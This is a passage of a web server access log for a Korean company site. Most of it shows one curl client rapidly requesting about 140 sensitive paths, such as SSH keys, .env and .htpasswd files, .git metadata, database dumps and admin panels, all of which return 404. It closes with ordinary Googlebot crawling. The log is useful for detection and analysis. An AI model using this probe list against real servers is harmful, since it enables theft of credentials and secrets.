185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/export.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/adminer-4.2.5-mysql-en.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpmyadmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpmyadmin/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpmyadmin/setup/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sql.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sqladmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dbadmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpminiadmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mysqladmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/database.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dump.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/data.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.tar" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/db_backup.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database_backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.config/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.docker/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.settings.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/node_modules/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tmp/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/config.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/config.json" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config-sample.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wordpress/wp-config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wordpress/wp-config-sample.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/entries" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.hg/hgrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.DS_Store" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htpasswd" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bash_history" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.bashrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/id_rsa" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/id_rsa.pub" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/key.pem" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/public.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ssl.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cert.pem" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/selfsigned.crt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/selfsigned.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/nginx.conf" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/httpd.conf" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose.override.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Dockerfile" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.nvmrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.yarnrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.rbenv-vars" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.ts" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.ts" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web.xml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/WEB-INF/web.xml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/META-INF/context.xml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/settings.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/settings.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/db.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/db.conf" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/sql.conf" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/.env.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/adminer.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/sqladmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/phpmyadmin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/secret.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/secret.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secret.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/secrets.json" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/credentials.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/install.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/setup.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/setup-config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configuration.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config_dev.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/index-dev.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/index-test.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/maintenance.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/maintenance.html" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/under-construction.html" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/down.html" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.maintenance" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/install/install.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/setup/setup.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/setup/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/upgrade.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/upgrade/index.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/upgrader.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/migrate.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/migration.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/console.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/install.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/db.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/deploy.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/logs.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/deploy.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/init.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/install.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/uninstall.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/remove.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/install.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/update.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/delete.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sample.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example-config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sample-config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:19:00:51 +0000] - - 301 - GET http www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.32] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:00:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.65] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:00:52 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.45] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.194] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.169] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:00:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.78] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:00:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.194] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:00:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.78] [Length 4450] [Gzip -] [Sent-to 